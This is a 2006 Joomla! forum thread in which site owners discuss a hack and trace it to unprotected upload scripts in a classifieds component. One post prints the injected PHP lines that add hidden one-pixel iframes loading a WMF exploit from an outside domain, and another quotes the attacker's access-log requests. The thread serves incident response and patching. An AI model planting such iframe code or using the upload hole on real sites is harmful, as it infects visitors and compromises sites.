The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 18 posts ] 
Author Message
 Post subject: Site Hacked
PostPosted: Thu Aug 03, 2006 9:31 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
Now it's ok but my site was hacked by someone. I've noticed that the file mod_mainmenu.php was hacked and inside someone added an iframe that goes to http://zchxsikpgz.biz/dl/xpladv521.wmf that is a Exploit.WMF.A.

My Joomla version is 1.0.10. How was that possible?

As soon as I can I'll post the mod_mainmenu.php modified. I've overwritten the hacked on with a fresh one and now everything is ok.

_________________
http://blog.shift.it
http://portale.shift.it


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 9:40 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Please list here the 3pds extensions you are using, as well as their version number.
Please also look here for known 3pds vulnerabilities and their upgrade if available.
http://forum.joomla.org/index.php/topic,79477.0.html

Changing the mod_mainmenu.php file will not help you as you have to figure first how your site was hacked in order to prevent it in the future.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Last edited by infograf768 on Thu Aug 03, 2006 9:42 am, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 9:48 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
You're right but at least I've restored the site functionality. Here's the list of components. I've seen that I've performs and maybe they've used this one to hack the site. I've deleted it.


You do not have the required permissions to view the files attached to this post.

_________________
http://blog.shift.it
http://portale.shift.it


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 9:55 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
Here are the lines added to my mod_mainmenu.php

Code:
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>'; if (!defined( '_MOS_MAINMENU_MODULE' )) {

_________________
http://blog.shift.it
http://portale.shift.it


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 10:05 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Be sure to delete all related files by ftp and check the modification dates for other files.

OT: I see sef_advance is displayed twice, and that, instead of JCE, you are using the older mce.

Also, docman is a versin RC1 and not RC2.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Last edited by infograf768 on Thu Aug 03, 2006 10:07 am, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 11:00 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Sep 07, 2005 5:49 pm
Posts: 19
@shiftsrl:

I do not know if you've resolved the issue yet or not, but today I was contacted by the administrator of a joomla site running on our server. He reported the exact same hack as you described (modified mod_mainmenu.php to include iframe to some site).

I searched the logfiles for his site and found the following lines:

Code:
82.207.99.8 - - [04/Aug/2006:11:06:51 +0200] "GET //administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14196 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:06:52 +0200] "GET //administrator/components/com_classifieds/popups/insert_image.php HTTP/1.0" 200 18502 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:21:50 +0200] "POST /administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14198 "-" "Mozilla/4.0 (compatible; Synapse)"
82.207.99.8 - - [04/Aug/2006:11:21:52 +0200] "GET /components/com_classifieds/adimages/config.php HTTP/1.0" 200 5 "-" "Mozilla/4.0"


This looked suspicious to me. A direct link to images.php? From an IP address in the Ukraine? I assume there aren't too many Ukranians who speak dutch (it's a dutch website).

I found that the direct URL does indeed allow direct execution of images.php, bypassing normal joomla security. That file, as well as a few other php files in that folder are missing some of the standard joomla security checks (like "defined( '_VALID_MOS' ) or die( 'Restricted access' );" for example). I'm not a joomla expert but I assume this is the cause of the vulnerability.

I still need the do several more checks to see if this is indeed the cause of the problem, but at the moment it sure looks like it. Since you posted that you're also running com_classifieds the same vulnerability may also be the cause of your problem.

HTH

Cheers,
Aspegic


Last edited by Aspegic on Sat Aug 05, 2006 11:07 am, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 2:03 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 2:36 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Sep 07, 2005 5:49 pm
Posts: 19
infograf768 wrote:
February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html


I do believe that thread discussus a different classifieds component called "Noah". The one installed on the website on our server used the classifieds component available at mambo.posluh.hr

The snapshot posted earlier by shiftsrl - showing the 3rd party components he has installed on his site - shows he uses the same version as was installed on my clients site: "Classifieds v1.3 M451".

I visited mambo.posluh.hr and it appears Classifieds version 1.3 M451 is currently the latest release available from that website (released january 2005). The download from their website still contains the php scripts without the necessary security checks.

Cheers,
Aspegic


Last edited by Aspegic on Sat Aug 05, 2006 2:49 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 3:03 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/

The security patch is clearly shown.

Hope it helps

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 3:29 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Sep 07, 2005 5:49 pm
Posts: 19
infograf768 wrote:
Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/


Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
Thanks for the link. I'll pass it along to my client.

Cheers,
Aspegic


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 3:43 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Aspegic wrote:

Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...



That old mambo site has not beem updated since april 2005.
It is dead I guess.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 5:09 pm 
Joomla! Intern
Joomla! Intern

Joined: Mon Aug 22, 2005 6:47 pm
Posts: 64
Maybe RobS takes this component to his list too ;D


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Wed Aug 09, 2006 10:22 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Aug 09, 2006 10:16 pm
Posts: 18
infograf768 wrote:
Aspegic wrote:

Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...



That old mambo site has not beem updated since april 2005.
It is dead I guess.


Hi, I have have just been made aware of this hack to one of my sites. I use the Classifieds component so downloaded the patch from the link above. However if you look at the two files in the patch the fix is negated by the line:

define( "_VALID_MOS", 1 );

Very strange. You need to comment this out, I believe


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Thu Aug 10, 2006 5:18 am 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
not only comment that out...  but add the following lines at the start of the file, just after the source commentary:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Thu Aug 10, 2006 6:52 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Aug 09, 2006 10:16 pm
Posts: 18
I think, this line:

require( "../../../../includes/auth.php" );  // Thx 2 Lismo

adds the important

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

However I see there are other files that don't have any protection. I am going to remove this component.


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sat Aug 12, 2006 4:28 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
Thanks for the info. In my case I think that the problem was the component PerForms wich I've deleted. In any case I've patched also the classified but a question still remains. Is this component secure with the patch or not?

_________________
http://blog.shift.it
http://portale.shift.it


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Sun Sep 10, 2006 11:58 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Wed Sep 14, 2005 12:15 pm
Posts: 3
Hi,
I have same problem with this component. Have also been hacked by Inserting Iframe.

I use this component a lot. Does anyone have any sugestion on this?

Is anybody out there whou could check security of this component adn posibly fix the security issues?


Top
 Profile  
 
 Post subject: Re: Site Hacked
PostPosted: Tue Aug 21, 2007 3:23 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Mon May 15, 2006 2:21 am
Posts: 491
Location: The magical land of Iowa
Has anyone every developed com_classified further? Any security issues still on this?

_________________
On the web since 1995. 495 posts in the old Mambo forum. Under the hood with Wordpress, Joomla, and Drupal since 2006. Many more platforms before and since.

http://www.newlocalmedia.com
http://www.twitter.com/newlocalmedia


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 18 posts ] 



Who is online

Users browsing this forum: No registered users and 10 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group